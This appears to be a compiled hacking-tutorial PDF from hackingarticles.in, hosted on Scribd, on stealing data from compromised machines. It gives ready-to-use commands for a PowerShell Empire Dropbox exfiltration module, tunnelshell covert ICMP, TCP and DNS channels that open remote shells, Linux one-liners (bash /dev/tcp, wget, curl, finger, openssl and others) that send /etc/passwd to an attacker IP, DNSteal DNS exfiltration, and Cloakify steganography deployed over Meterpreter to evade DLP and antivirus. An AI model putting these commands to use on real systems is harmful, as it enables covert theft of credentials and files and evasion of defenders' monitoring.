Scribd
Upload
25 views

Methods of Data Exfiltration

notas

Uploaded by

Doloran Doloran
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
25 views

Methods of Data Exfiltration

notas

Uploaded by

Doloran Doloran
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 48

www.hackingarticles.

in Page |1
Table Of Contents
Introduction ................................................................................................................................ 5
Methods of Data Exfiltration .................................................................................................... 5
Data Exfiltration using PowerShell Empire .................................................................................... 6
Generate Token Via Dropbox API .............................................................................................. 7
Data Exfiltration ....................................................................................................................... 8
........................................................................................... 9
Covert Channel: The Hidden Network ......................................................................................... 10
What is the covert channel? ................................................................................................... 10
Covert Channel Attack Using Tunnelshell ................................................................................ 10
What is tunnelshell? ..................................................................................................................... 11
Covert ICMP Channel .................................................................................................................... 14
Covert HTTP Channel .................................................................................................................... 15
Covert DNS Channel ...................................................................................................................... 16
Data Exfiltration using Linux Binaries .......................................................................................... 18
Introduction to Linux Binaries ................................................................................................. 18
Data exfiltration using default Linux Binaries .......................................................................... 18
/Cancel .......................................................................................................................................... 18
/wget ............................................................................................................................................. 20
/whois ........................................................................................................................................... 21
/bash ............................................................................................................................................. 22
/OpenSSL ....................................................................................................................................... 23
/busybox ....................................................................................................................................... 24
/nc ................................................................................................................................................. 25
Data exfiltration using apt-installed Linux binaries .................................................................. 26
/curl ............................................................................................................................................... 26
/finger ........................................................................................................................................... 27
/irb................................................................................................................................................. 28
/ksh ............................................................................................................................................... 29
/PHP .............................................................................................................................................. 30
/Ruby ............................................................................................................................................. 30
................................................................................................. 32
Data Exfiltration using DNSSteal ................................................................................................. 33
DNS Protocol and it’s working ................................................................................................ 33

www.hackingarticles.in Page |2
DNS Data Exfiltration and it’s working .................................................................................... 33
Introduction to DNSteal.......................................................................................................... 33
Proof of Concept .................................................................................................................... 34
......................................................................................................................... 40
Cloakify-Factory ......................................................................................................................... 41
Cloakify Installation & Usages (for Linux) ................................................................................ 41
Method -I ...................................................................................................................................... 43
Method II....................................................................................................................................... 47
Cloakify Installation and Usages (For Windows) ...................................................................... 49
About Us ................................................................................................................................ 55

www.hackingarticles.in Page |3
Introduction
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data
transfer from a computer. It is also commonly called data extrusion or data exportation. Data
exfiltration is also considered a form of data theft. During the past couple of decades, a number of
data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and
intellectual property of businesses and national security of governments across the world.

Methods of Data Exfiltration


Open Methods:

 HTTP/HTTPS Downloads & Uploads


 FTP
 Email
 Instant Messaging
 P2P filesharing

Concealed Methods:

 SSH
 VPN
 Protocol Tunneling
 Cloud Storage Uploads
 Steganography
 Timing channel

(From Wikipedia)

www.hackingarticles.in Page |5
Data Exfiltration using PowerShell Empire
Generate Token Via Dropbox API
In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox.
Then after creating the account, head to developer tools here. A webpage will open similar to the one
shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose
“App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and
Generate access token. This will give the Dropbox API required for this particular practical; now copy
the generated token.

www.hackingarticles.in Page |7
Data Exfiltration
Now we are going to use Powershell empire for exfiltration, considering we have already
compromised the victim machine and we are about to complete our mission by copying data from
inside the victim without his knowledge.
As you can observe we have Empire-agent which means I have already spawned shell of victim’s
machine and Empire has post exploit for data exfiltration where we will use the above token.

usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey <API Token>
execute

As you can observe that I have notes.txt inside /my files which means we have successfully transferred
the data from a source location to destination.

Thus, in this way, we have successfully transferred the data from the victim’s machine to our dropbox
and hence this technique is known as dropbox exfiltration.

www.hackingarticles.in Page |8
Covert Channel: The Hidden Network
What is the covert channel?
The word covert means “hidden or undetectable” and Channel is “communication mode”, hence a
covert channel denotes an undetectable network of communication. This makes the transmission
virtually undetectable by administrators or users through a secret channel. It’s very essential to know
the difference between encrypted communication and covert communication. In covert
communication, the data stream is garbled and lasting by an unauthorized party. However, encrypted
communications do not hide the fact that there has been a communication by encrypted the data
travelling between both endpoints.

Type of covert channel


 Storage covert Channel: Communicate by modifying a “storage location”, that would allow
the direct or indirect writing of a storage location by one process and the direct or indirect
reading of it by another.
 Timing Covert channels – Perform operations that affect the “real response time observed”
by the receiver.

Note: The well – known Spectre and Meltdown use a system’s page cache as their covert channel for
exfiltrating data.
The specter and Meltdown attacks work by tricking your computer into caching privileged memory and
through miscalculated speculative execution, a lack of privilege checking in out-of-order execution, and
the power of the page cache. Once privileged memory is accessed the processor caches the information
and the processor is able to retrieve it from the cache, regardless of whether its privileged information
or not.

Covert Channel Attack Using Tunnelshell


It is possible to use almost any protocol to make a covert channel. The huge majority of covert channel
research has based on layer 3 (Network) and layer 4 (Transport) protocols such as ICMP, IP and TCP.
Layer 7 (Application) protocols such as HTTP and DNS are also frequently used. This mechanism for
conveying the information without alerting network firewalls and IDSs and moreover undetectable by
netstat.

www.hackingarticles.in P a g e | 10
What is tunnelshell?
Tunnelshell is a program written in C for Linux users that works with a client-server paradigm. The
server opens a /bin/sh that clients can access through a virtual tunnel. It works over multiple
protocols, including TCP, UDP, ICMP, and RawIP, will work. Moreover, packets can be fragmented to
evade firewalls and IDS.
Let’s go with practical for more details.

Requirement
 Server (Kali Linux)
 Client (Ubuntu18.04)
 Tool for Covert Channel (Tunnelshell) which you can download from here.
Here, I’m assuming we already have a victim’s machine session through the c2 server. Now we need
to create a hidden communication channel for data exfiltration, therefore, install tunnelshell on both
endpoints.
Once you download it, then extract the file and compile it as shown below:

tar xvfz tunnelshell_2.3.tgz


make

Similarly, repeat the same at the other endpoint (victim’s machine) and after completion, execute the
following command in the terminal to open communication channel for the server (Attacker).

sudo ./tunneld

www.hackingarticles.in P a g e | 11
By default, it sends fragment packet, which reassembles at the destination to evade from firewall and
IDS.

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s
machine) which will establish a covert channel for data exfiltration.

Syntax: ./tunnel -i <session id (0-65535)> -d <delay in sending packets> -s <packet size> -t <tunnel type>
-o <protocol> -p <port> -m <ICMP query> -a <ppp interface> <Victim’s IP>

./tunnel -t frag 10.10.10.2

frag: It uses IPv4 fragmented packets to encapsulate data. When some routers and firewalls (like Cisco
routers and default Linux installation) receives fragmented packets without headers for the fourth
layer, they permit pass it even if they have a rule that denies it. As you can observe that it is successfully
connected to 10.10.10.2 and we are to access the shell of the victim’s machine.

As I had said, if you will check the network statics using netstat then you will not observe any process
ID for tunnelshell.

www.hackingarticles.in P a g e | 12
From the given below image, you can observe that with the help of ps command I had checked in
process for tunnelshell and then try to check its process id through netstat.

ps |grep .tunneld
netstat –ano

Let’s take a look of network traffic generated between 10.10.10.1 (Attacker’s IP) and10. 10.10.2
(Victim’s IP) using Wireshark. The network flow looks generic between both endpoints, but if it
monitors properly, then a network administrator could sniff the data packet. As you can observe that
Wireshark has captured the covert traffic and sniff the data that was travelling between two endpoint
devices.

www.hackingarticles.in P a g e | 13
Covert ICMP Channel
As we know Ping is the use of ICMP communication that use icmp echo request and icmp echo reply
query to establish a connection between two hosts, therefore, execute the below command:

sudo ./tunneld -t icmp -m echo-reply, echo

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s
machine) which will establish a covert channel for data exfiltration.

./tunnel -t icmp -m echo-reply,echo 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and the attacker is able to access
the shell of the victim’s machine.

Again, if you will capture the traffic through Wireshark then you will notice the ICMP echo request and
reply packet is being travelled between both endpoints. And if you will try to analysis these packets
then you will be able to see what kind of payload is travelling as ICMP data.

www.hackingarticles.in P a g e | 14
Covert HTTP Channel

It establishes a virtual TCP connection without using three-way handshakes. It doesn’t bind any port,
so you can use a port already use it by another process, therefore execute the below command:

sudo ./tunneld -t tcp -p 80,2000

Now to connect with tunnelshell we need to execute the following command on the server
(Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t tcp -p 80,2000 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and again attacker is able to access
the shell of the victim’s machine.

on other side, if you consider the network traffic then you will notice a tcp communication establish
without three-way-handshake between source and destination.

www.hackingarticles.in P a g e | 15
Covert DNS Channel
To establish DNS covert channel, we need to run UDP tunnel mode on both endpoint machines.
Therefore, execute the following command on the victim’s machine:

sudo ./tunneld -t udp -p 53,2000

Similarly, execute following on your (Attacker) machine to connect with a tunnel.

./tunnel -t udp -p 53,2000 10.10.10.2

As you can observe here the DNS malformed packet contains the data travelling between both
endpoint machine.

Conclusion: Covert channel does not send encrypted data packet while data exfiltration, therefore, it
can easily sniff, and network admin can easily conduct data loss and risk management.

www.hackingarticles.in P a g e | 16
Data Exfiltration using Linux Binaries
Introduction to Linux Binaries
Binaries can be described as files that contain source codes compiled together. These binary files are
also called as executables files, as they can be executed in the system. Here, we will be using file
uploading binaries to perform data exfiltration. This article is divided into two part;
 Data exfiltration using default Linux Binaries
 Data exfiltration using apt-installed Linux binaries
Now, switch on the Linux operating systems i.e., Kali Linux and Ubuntu. We will simultaneously see
one of the two systems posing as an attacker and the other as a victim.

Data exfiltration using default Linux Binaries


/Cancel
We can use /cancel binary to sneakily use file upload and send the file to the attacker machine over
TCP connection.

Victim Machine
Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system by entering the file to upload, the victim IP, and the remote port for file transfer. To
perform data exfiltration, you can type

cancel -u "$(cat /etc/passwd)" -h 192.168.0.147:1234

www.hackingarticles.in P a g e | 18
Attacker Machine

Here the Kali Linux is used as the attacker machine that uses port 1234 for listening using Netcat, you
can use
nc -lvp 1234

Here you see that the contents of the file /etc/passwd with all the users are listed.

www.hackingarticles.in P a g e | 19
/wget
It is a computer program that usually retrieves content from web servers. We can use /wget binary
to sneakily use file upload and send the file to the attacker machine over HTTP POST.

Victim Machine

Here we use Ubuntu on our victim machine and send a local file with an HTTP POST request. To
implement this, you can use the command

wget --post-file=/etc/passwd 192.168.0.147

Attacker Machine

Here we are using Kali Linux as the attacker machine. To get the file, Netcat is used as a listener, and
type this command,

nc -lvp 80

Here you see that the contents of the file /etc/passwd with all the users are listed on the attacker
machine.

www.hackingarticles.in P a g e | 20
/whois

We can use /whois binary to sneakily use file upload and send the file to the attacker machine over
TCP connection.

Victim Machine
Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system by entering the file to upload, the victim IP, and the remote port for file transfer. To
perform data exfiltration, you can type

whois -h 192.168.0.147 -p 43
`cat /etc/passwd`

Attacker Machine

Here the Kali Linux is used as the attacker machine that uses port 43 for listening using Netcat, you
can use
nc -lvp 43
Here you see that the contents of the file /etc/passwd with all the users are listed.

www.hackingarticles.in P a g e | 21
/bash
It is a Unix shell and command language We can use /bash binary to sneakily use file upload and send
the file to the attacker machine over HTTP POST.

Victim Machine

Here we have made use of the Ubuntu system as the victim machine. To upload the file from the victim
system to the attacker system by entering the file to upload, the victim IP, and the remote port for file
transfer. To perform data exfiltration, you can type

bash -c 'echo -e "POST / HTTP/0.9\n\n$(</etc/passwd)" >


/dev/tcp/192.168.0.147/1234’

Attacker Machine

Here the Kali Linux is used as the attacker machine that uses port 1234 for listening using Netcat, you
can use

nc -lvp 1234

Here you see that the contents of the file /etc/passwd with all the users are listed.

www.hackingarticles.in P a g e | 22
/OpenSSL
OpenSSL is a robust, highly -featured toolkit for the TLS and SSL protocols. We can use /openssl binary
to use for file upload and send the file to the attacker machine over TCP connection.

Victim Machine
Here we have made use of the Ubuntu system as the victim machine. To upload the file from the victim
system to the attacker system by entering the file to upload, the victim IP, and the remote port for file
transfer. To perform data exfiltration, you can type

openssl s_client -quiet -connect 192.168.0.147:1234 < "/etc/passwd"

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, you can type;

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days
365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 > passwd

To check the contents of the file, you can type;

cat passwd

www.hackingarticles.in P a g e | 23
/busybox
It is a software suite that provides various Linux utilities in a single executable file. We can use
/busybox binary to sneakily use file upload and send the file to the attacker machine over HTTP.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running an HTTP server, you can type

busybox httpd -f -p 8080 -h

www.hackingarticles.in P a g e | 24
Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, you can type;

wget http://192.168.0.196:8080/data.txt

To read the contents of the file, type

cat data.txt

/nc
Netcat is a command-line tool for reading, writing, redirecting, and encrypting data across a network.
We can use /nc binary to sneakily use file upload and send the file to the attacker machine over the
Tcp connection.

Victim Machine

Here we are using, Kali Linux as the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running a TCP, you can type;

nc -lvp 5555 < jeeni.txt

to read the contents of the file, type


cat jeeni.txt

www.hackingarticles.in P a g e | 25
Data exfiltration using apt-installed Linux binaries
/curl
It is a command-line tool that is used for transferring data using various network protocols. We can
use /curl binary to sneakily use file upload and send the file to the attacker machine over the HTTP
POST connection. So, the first step would be to install curl binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running an HTTP Post request, you can type;

curl -X POST -d @data.txt 192.168.0.147

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, you can type;

nc -lvp 80 > data.txt

To read the file, type

cat data.txt

www.hackingarticles.in P a g e | 26
/finger
It is a program you can use to find information about computer users. We can use /finger binary to
sneakily use file upload and send the file to the attacker machine over the TCP connection. So, the
first step would be to install finger binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running the TCP request, you can type;

finger "$(cat /etc/passwd)@192.168.0.147"

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, you can type

nc -lvp 79

You can see the user accounts from the /etc/passwd.

www.hackingarticles.in P a g e | 27
/irb
It is a tool to execute interactively ruby expressions read from stdin. We can use /irb binary to sneakily
use file upload and send the file to the attacker machine over the HTTP. So, the first step would be to
install irb binary using apt.

Victim Machine
Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running the HTTP server on port 8888, you can type;

irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot =>
Dir.pwd).start;

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, in the browser you can type

192.168.0.196:8888

www.hackingarticles.in P a g e | 28
/ksh
KornSHell is a shell and programming language that executes commands read from a terminal or a
file We can use /ksh binary to sneakily use file upload and send the file to the attacker machine over
the HTTP. So, the first step would be to install ksh binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running the HTTP server on port 1234, you can type;

ksh -c 'cat /etc/passwd > /dev/tcp/192.168.0.147/1234'

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, in the browser you can type

nc -lvp 1234

www.hackingarticles.in P a g e | 29
/PHP
It is a scripting language that is especially suited to web development. We can use /PHP binary to
sneakily use file upload and send the file to the attacker machine over the HTTP. So, the first step
would be to install the php binary using apt.

Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running the HTTP server on port 8080, you can type;

php -S 0.0.0.0:8080

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, in the browser you can type

wget 192.168.0.196:8080/data.txt

/Ruby
It is a high-level general processing language. We can use /ruby binary to sneakily use file upload and
send the file to the attacker machine over the HTTP server. So, the first step would be to install the
ruby binary using apt.

www.hackingarticles.in P a g e | 30
Victim Machine

Here the Ubuntu system is the victim machine. To upload the file from the victim system to the
attacker system serve files in the local folder by running the HTTP server on port 1234, you can type;

ruby -run -e httpd . -p 1234

Attacker Machine

Here we are using, Kali Linux as the attacker machine. In order to download the file on the attacker
machine, in the browser you can type

192.168.0.196:1234

You can try out other Linux binaries for data exfiltration from https://gtfobins.github.io/

www.hackingarticles.in P a g e | 31
Data Exfiltration using DNSSteal
DNS Protocol and it’s working
The DNS protocol works on TCP/UPD port 53. It is a stateless protocol as it exchanges specific
information. It allows a network to connect to the internet and without it, all the surfing on the
internet would be impossible and far-fetched. Its function is to translate IP address to hostnames (for
the convenience of the user) and vice versa. Hence the utmost importance of DNS in a network.

DNS Data Exfiltration and it’s working


As we know that DNS is a stateless protocol, i.e. it was never meant to send or receive data from a
client to the server. Even so, the authorized DNS will believe that all the queries sent to it are
legitimate. And this fact is exploited by attackers as if a request made to a subdomain then that
request is treated as data only if the query is constructed properly. For instance, the attacker sends a
query to example.target.com and the DNS target.com receives ‘example’ as a string then it will
consider the said string as data and this will let the attack access target.com. Now, this lets the attacker
set up a covert channel mostly by using the C2 server between DNS and client and retrieves all the
data through bidirectional communication. Manipulating DNS in such a way to retrieve sensitive data
is known as DNS data Exfiltration.
When data is transferred from one system to another without any direct connection and this transfer
of data is done over DNS protocol then it is known as DNS Data Exfiltration. DNS protocol is exploited
to get attackers to get their hands-on sensitive data.

Introduction to DNSteal
DNSteal is a tool that sets up a fake DNS server and allows an attacker to sneak in a network. As the
name suggests it is based on DNS protocol and works on port 53. It is used to extract data from the
target after setting up the connection and is one of the best tools for DNS Data Exfiltration. Multiple
files can be extracted using this tool. It also supports Gzip file compression. It all lets you manage the
size of packets which carries your data over the network to reduce suspicions.

www.hackingarticles.in P a g e | 33
Proof of Concept
Download DNSteal using the following command:

git clone https://github.com/m57/dnsteal

And to further initiate the tool and see all the parameters it provides, use the following command:
python dnsteal.py

www.hackingarticles.in P a g e | 34
Now we will generate a command using DNSteal; the said command will extract the desired data upon
execution on the target system. To generate the command, give your local IP and use -z parameter.
This -z parameter will unzip the files upon receiving as they are zipped by default. Therefore, type:

python dnsteal.py 192.168.1.112


-z

From our target system, we will request the secret.txt file over the DNS connection that will establish
when we will run the given command. The contents of secret.txt can be seen in the following image.
Now as you can see in the image above, two commands are generated. Copy the first one (highlighted
one).

And paste it in the destination folder. Before executing the command, make sure that filename has
been changed to the name of the file you desire as shown in the image below:

Note: if you received an error “dig:


‘H4sICLttFF8AA3NlY3JldC50eHQAy8hUyFRIzFUoSsziAgC/9XeXDAAAA-.A==-.secret.txt’ is not a legal
IDNA2008 name (string start/ends with forbidden hyphen),” then just edit your above command
(f=secret.txt) by adding “+noidnin +noidnout” at end of the command you have pasted.

www.hackingarticles.in P a g e | 35
And when the command is executed, the requested file will be received on your terminal. The tool will
also calculate the MD5 hash sum for you. Also, you can view the content of the file with the cat
command as shown in the image below:

Now we will try to extract a whole folder instead of a single file. Initiate the DNS server provided by
DNSteal tool via typing the following command:

python dnsteal.py 192.168.1.112 -z

The folder which we will try to retrieve is shown in the image below, inclusive of their contents. The
folder contains all type of data including .pdf, .msi, .png, .dll.
Again, you will see that it generated two commands. However, this time we will copy the second one
(highlighted on) and paste it in the destination folder as shown below:

www.hackingarticles.in P a g e | 36
Upon the execution of the command, you can see the folder is received accurately with the calculated
MD5 hash sum for each file as shown in the image below:

To reduce the suspicion of the attack, an attacker can divide the file into multiple packets. These
packets can be of fixed size in bytes. An attacker can even allocate some bytes to the file name. this is
done to avoid triggering an alert in a network which abusing of UDP packet’s size will do. This
customization can be done by using -s, -b and -f parameters. The parameter -s is for defining the
subdomain value, -b is for specifying the number of bytes per packet and -f is for defining the value of
bytes for the filename. In the following command, which can be well observed from the image given
below as well, we have defined 4 subdomains. The bytes per packet are set to 57and file name value
is 17.

python dnsteal.py 192.168.1.112 -z -s 4 -b 57 -f 17

www.hackingarticles.in P a g e | 37
Now we will acquire the passwd file from the target. As you can see from the image below, the size of
the file is 2511 bytes. Now just copy the command and paste it in the /etc folder on the target system.
Again, before executing the command make sure to change the filename to passwd.

Once the command is executed, you can see that the data received will be in chunks of 243 bytes as
shown in the image below. And when the receiving is complete, it will give you the MD5 hash sum too
and you can read the contents of the file with simple cat command as the file received will be
uncompressed:

www.hackingarticles.in P a g e | 38
And this way we have retrieved the password file. And while this transfer of data, Wireshark helped
us validate the bytes per packet size. Also, we can confirm that the connection established as well as
the transfer of data is being done on port 53.

www.hackingarticles.in P a g e | 39
Cloakify-Factory
Cloakify Installation & Usages (for Linux)
CloakifyFactory – Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into a list of
everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting
Controls, Social Engineering of Analysts, Evade AV Detection.
Only you need to type following for downloading the cloakify from GitHub in the target machine.

git clone https://github.com/TryCatchHCF/Cloakify.git


cd Cloakify.py
chmod -R 777 noiseTools

Let’s run the python script to lunch cloakifyfactory.py

python cloakifyFactory.py

CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to
Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of
strings that encodes the Base64 payload. You then transfer the file however you wish to its desired
destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.

www.hackingarticles.in P a g e | 41
Let’s take an example now that we want to copy a text file “pwd.txt” from within the target system
containing the login credentials of different machines in the network.

www.hackingarticles.in P a g e | 42
Method -I
It may be dangerous to copy the text file directly, so we will transform the input file data into another
file as output. To do so follow the below steps:
1. Run the python script to launch cloakifyfactory.py
2. Press 1 to select cloakify a file option
3. Enter the path of the source file that you want to transform the input file.
4. Enter the path of the destination file to where you want to save the output.

www.hackingarticles.in P a g e | 43
Further, you will get a list of ciphers, choose the desired option for encrypting the file. Suppose I want
the whole content to get changed into facial emojis.
1. Press 3 for emoji cipher
2. Allow to Add noise to cloaked file by pressing Y for yes.
3. Then press 1 to select prependemoji.py as a noise generator.
This will save the output result inside the raj.txt file.

www.hackingarticles.in P a g e | 44
As result, you will get the output content something like shown in the below image.

Now if you want to obtain the output result in its original format, then you can go with the decloakify
option which will revert the transformation into its original existence, but before that, you have to
give all permissions to removeNoise.py

chmod 777 removeNoise.py

www.hackingarticles.in P a g e | 45
To do so follow the below steps:
1. Run the python script to launch cloakifyfactory.py
2. Press 2 to select decloakify a file option
3. Enter the path of the file that you want to restore back into its original format.
4. Enter the path of the file to where you want to save the output.

Press Y to answer yes because we have added noise to cloaked file and select noise generator.

www.hackingarticles.in P a g e | 46
Method II
Again, we have a similar file that we want to cloaked into another format directly without operating
the cloakifyfactory console.

This time you can use a single command to cloak the file by adding specify the type of cipher as given
below:

www.hackingarticles.in P a g e | 47
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek

After executing the above command, we can observe the output result would be something like this
as shown in the below image.

www.hackingarticles.in P a g e | 48
So, we have used the file.txt file as destination file to save the transformed information inside it
without printing the output result on the screen. Moreover, further, we have used decloak command
to revert the transformed file back into its original state.

python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek >


/root/Desktop/file.txt
python decloakify.py /root/Desktop/pwd.txt ciphers/starTrek

Cloakify Installation and Usages (For Windows)


As we all know this is an exfiltration tool and data could be exfiltrate from any platform either from
Linux or Windows based OS, therefore cloakifyfactory has built the application both platforms. In the
1st phase, we have use python-based application for Linux machine and now remotely we are going to
deploy cloakify factory inside Windows machine using MSI package of python for our python based
application.
Thus, we downloaded the MSI package in our local machine (Kali Linux):
wget https://www.python.org/ftp/python/2.7/python-2.7.msi

www.hackingarticles.in P a g e | 49
Now our purpose is to show how an intruder can remotely exfiltrate the data using cloakifyfactory.
So, we had compromised the system first and got the meterpreter session and then uploaded the MSI
package inside the victim’s machine to install the dependency required for python.

upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn

Now download the zip file for cloakifyfactory from GitHub in your local machine.

www.hackingarticles.in P a g e | 50
We also need to download 7-zip exe program for extracting the cloakify-master.zip.

Now extract the 7za920.zip and you will get the 7za.exe file that we have to inject in the victim’s
machine.

www.hackingarticles.in P a g e | 51
Now let’s upload 7za.exe and cloakfy-master.zip in the remote system. And further, use the 7za.exe
program to unzip the cloakify-master.zip.
Therefore, execute the following command:

upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip

Now we want to transfer the secret.txt file of the compromised machine but directly copying the file
might generate the alert, therefore, we will transform the data as done above.

www.hackingarticles.in P a g e | 52
Now again we try to covert the content of the secret.txt file by hiding it behind the cloaked file. And it
is very simple as performed earlier with little modification. So now we can run the cloakify.py file with
the help of python.

C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt


ciphers\pokemonGo > dump.txt
type dump.txt

Thus, we can observe that with the help of cloakify we have transformed the filetype cannot be
detected easily.

Reference:
 https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-
steganography/
 https://www.hackingarticles.in/data-exfiltration-using-dnssteal/
 https://www.hackingarticles.in/data-exfiltration-using-linux-binaries/
 https://www.hackingarticles.in/covert-channel-the-hidden-network/
 https://www.hackingarticles.in/data-exfiltration-using-powershell-empire/

www.hackingarticles.in P a g e | 53
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security


Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer


Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in

You might also like